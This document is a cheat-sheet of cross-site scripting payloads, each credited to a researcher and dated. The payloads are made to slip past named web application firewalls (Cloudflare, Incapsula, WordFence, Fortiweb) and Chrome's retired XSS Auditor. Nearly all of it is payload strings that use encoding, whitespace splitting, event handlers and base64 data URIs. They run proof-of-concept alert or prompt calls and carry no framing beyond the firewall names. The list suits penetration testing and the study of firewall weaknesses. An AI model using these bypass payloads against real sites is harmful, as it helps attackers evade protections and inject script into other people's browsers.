Common WAF Bypass
Cloudflare
-
25st January 2021 - @Bohdan Korzhynskyi
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
-
21st April 2020 - @Bohdan Korzhynskyi
<svg/OnLoad="`${prompt``}`">
-
22nd August 2019 - @Bohdan Korzhynskyi
<svg/onload=%26nbsp;alert`bohdan`+
-
5th June 2019 - @Bohdan Korzhynskyi
1'"><img/src/onerror=.1|alert``>
-
3rd June 2019 - @Bohdan Korzhynskyi
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
-
22nd March 2019 - @RakeshMane10
<svg/onload=alert()//
-
27th February 2018
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
Chrome Auditor
NOTE: Chrome Auditor is deprecated and removed on latest version of Chrome and Chromium Browser.
- 9th August 2018
</script><svg><script>alert(1)-%26apos%3B
Incapsula WAF
-
11th May 2019 - @daveysec
<svg onload\r\n=$.globalEval("al"+"ert()");>
-
8th March 2018 - @Alra3ees
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
-
11th September 2018 - @c0d3G33k
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
Akamai WAF
WordFence WAF
- 12th September 2018 - @brutelogic
<a href=javascript:alert(1)>
Fortiweb WAF
- 9th July 2019 - @rezaduty
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
References